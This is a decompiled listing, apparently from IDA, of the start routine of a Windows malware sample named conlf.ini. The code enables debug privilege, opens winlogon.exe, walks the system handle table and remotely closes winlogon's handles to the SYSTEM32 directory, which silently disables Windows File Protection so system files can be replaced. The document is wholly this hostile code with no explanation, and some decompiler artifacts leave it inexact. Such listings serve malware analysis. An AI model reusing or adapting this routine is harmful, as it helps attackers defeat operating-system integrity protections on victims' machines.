IDA - C:\Documents and Settings\Administrator\Desktop\conlf.idb (conlf.ini)

void __cdecl start() { HMODULE hNtdll; // eax@1 HMODULE hNtdll2; // eax@1 int v2; // edx@5 SYSTEM_HANDLE_INFORMATION *hTable; // ecx@5 SYSTEM_HANDLE_TABLE_ENTRY_INFO *hEntry; // edi@5 HANDLE hCurrentProcess; // eax@7 SYSTEM_HANDLE_TABLE_ENTRY_INFO *v6; // [sp-3Ch] [bp-3Ch]@8 int v7; // [sp-38h] [bp-38h]@14 SYSTEM_HANDLE_INFORMATION *v8; // [sp-34h] [bp-34h]@14 int v9; // [sp-28h] [bp-28h]@6 SYSTEM_HANDLE_INFORMATION *v10; // [sp-24h] [bp-24h]@6 EnableDebug(); hNtdll = GetModuleHandleA("NTDLL.DLL"); NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation"); hNtdll2 = GetModuleHandleA("NTDLL.DLL"); NtQueryObject = GetProcAddress(hNtdll2, "NtQueryObject"); winlogon_pid = GetPidFromName("winlogon.exe"); hSourceProcessHandle = OpenProcess(PROCESS_DUP_HANDLE, 0, winlogon_pid); if ( NtQuerySystemInformation(SystemHandleInformation, 0, 0, &dwSize) == STATUS_INFO_LENGTH_MISMATCH ) { do { dwSize += 4096; if ( lpAddress ) VirtualFree(lpAddress, 0, 0x8000u); lpAddress = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_READWRITE); } while ( NtQuerySystemInformation(SystemHandleInformation, lpAddress, dwSize, &retLength) == STATUS_INFO_LENGTH_MISMATCH ); } hTable = *lpAddress; hEntry = (lpAddress + 4); v2 = 0; while ( 1 ) { v10 = hTable; v9 = v2; if ( *&hEntry->UniqueProcessId != winlogon_pid ) goto next_handle; hCurrentProcess = GetCurrentProcess(); if ( DuplicateHandle( hSourceProcessHandle, hEntry->HandleValue, hCurrentProcess, &TargetHandle, 0, 0, DUPLICATE_SAME_ACCESS) ) { if ( !NtQueryObject(TargetHandle, ObjectNameInformation, &pObjectName, 532, 0) ) { CharUpperW(pObjectName.Name.Buffer); if ( strstrW(L"WINDOWS\\SYSTEM32", pObjectName.Name.Buffer) == 1 || strstrW(L"WINNT\\SYSTEM32", pObjectName.Name.Buffer) == 1 ) { CloseHandle(TargetHandle); DuplicateHandle( hSourceProcessHandle, hEntry->HandleValue, hCurrentProcess, &TargetHandle, 0, 0, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE); CloseHandle(TargetHandle); goto next_handle; } } hEntry = v6; } CloseHandle(TargetHandle); next_handle: hTable = v8; v2 = v7 + 1; if ( v7 + 1 >= v8 ) { VirtualFree(lpAddress, 0, 0x8000u); CloseHandle(hSourceProcessHandle); TerminateProcess(hCurrentProcess, 0); } ++hEntry; } }